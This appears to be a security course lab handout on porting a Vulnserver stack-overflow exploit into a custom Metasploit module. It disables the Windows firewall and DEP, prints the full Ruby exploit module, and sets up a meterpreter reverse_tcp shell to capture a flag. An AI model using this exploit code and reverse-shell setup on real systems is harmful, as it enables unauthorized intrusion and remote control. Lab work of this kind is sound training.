H 311: Adding a Custom Exploit to Metasploit (15 pts)

What you need

Purpose

To practice adding custom modules to Metasploit.

Task 1: Preparing the Windows Target

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.

Type FIREWALL.

In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Turning Off DEP

On your Windows machine, click Start and type "Control Panel".

In Control Panel, click "System and Security". Click System.

In the System box, click "Advanced System Settings".

In System Properties, on the Advanced tab, in the Performance section, click the Settings button.

In the Performance Options box, on the "Data Execution Prevention" tab, click "Turn on DEP for essential Windows programs and services only", as shown below.

Click OK. Click OK again. Click OK again.

Restart your server.

Preparing the Vulnerable Server

On your Windows machine, in Internet Explorer, open this page:

http://getfirefox.com

Install Firefox.

In Firefox, go to

http://sites.google.com/site/lupingreycorner/vulnserver.zip

If that link doesn't work, try this alterative download link.

Save the "vulnserver.zip" file in your Downloads folder.

Click Start, "File Explorer". Navigate to your Downloads folder.

In your Downloads folder, right-click vulnserver.

Click "Extract All...", Extract.

A "vulnserver" window opens. Double-click vulnserver.

In the "Open File - Security Warning" box, click OK.

The Vulnserver application opens, as shown below.


Task 2: Preparing the Debian Server

You should already have Metasploit and Nmap installed, as detailed in the previous project.

Testing the Target Server

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.
sudo nmap -sV -p9999 192.168.100.3
You should see the port open, as shown below.


Task 3: Exploiting the Windows Target

Searching for a Metasploit Exploit

On your Debian server, execute this command:
sudo msfconsole -q
At the msf5 > prompt, execute this command:
search vulnserver
No exploits are found, as shown below.

Adding a Custom Exploit

On your Debian server, execute these commands:
mkdir -p /root/.msf4/modules/exploits/windows/misc
sudo nano  /root/.msf4/modules/exploits/windows/misc/vulnserver_bof.rb
Paste in this code:
# Metasploit template from corelan.be
# BoF for vunserver thegreycorner.com
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote # A remote exploit

include Msf::Exploit::Remote::Tcp # using TCP connection

def initialize(info = {})
super(update_info(info,
'Name' => 'Vunserver stack overflow',
'Description' => %q{
This module exploits a stack overflow in a
vulnserver.
},
'Author' => [ 'Stephen Bradshaw','Duncan Winfrey' ],
'Version' => '$Revision: 9999 $',
'References' =>
[
[ 'Vunserver', 'http://www.thegreycorner.com/p/vulnserver.html' ],
[ 'corelan.be', 'http://tinyurl.com/64s3je4' ],
],

'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0A\x0D",
},
'Platform' => 'win',

'Targets' =>
[
['Windows XP Universal',
{ 'Ret' => 0x625011af, 'Offset' => 2003 } ],
],
'DefaultTarget' => 0,

'Privileged' => false
))

register_options(
[
Opt::RPORT(9999)
], self.class)
end

def exploit
connect

junk = make_nops(target['Offset'])
sploit = 'TRUN /.:/' + junk + [target.ret].pack('V') + make_nops(32) + payload.encoded
sock.put(sploit)

handler
disconnect

end

end

Finding the New Exploit

On your Debian server, execute this command:
sudo msfconsole -q
It asks if you want to setup a database. Reply no.

At the msf5 > prompt, execute this command:

search vulnserver
No exploits are found.

To load the new exploit, execute these commands:

reload_all
search vulnserver
Now the module is found, as shown below.

Selecting Options and Payload

At the msf5 > prompt, execute these commands:
use exploit/windows/misc/vulnserver_bof
show info
This exploit requires RHOSTS. We also need to select a payload. Any payload 500 bytes or smaller is allowed, as shown below,

Execute these commands to select a payload and see what options it requires:

show payloads
set payload windows/meterpreter/reverse_tcp
show options
The payload requires LHOST, as shown below,

Execute these commands to perform the exploit, using the correct addresses for your Debian and Windows machines:

set RHOSTS 192.168.100.3
set LHOST 192.168.100.1
exploit
The options required for this exploit are listed. The required options are RHOST and LHOST.

You get a shell, as shown below,

H 311.1: Architecture (15 pts)

In the shell, execute this command:
tasklist /m java*
Find the Architecture name, which is covered by a green box in the image below. That's the flag.

Sources

Porting VulnServer TRUN /.:/ exploit to Metasploit

Posted 5-21-2020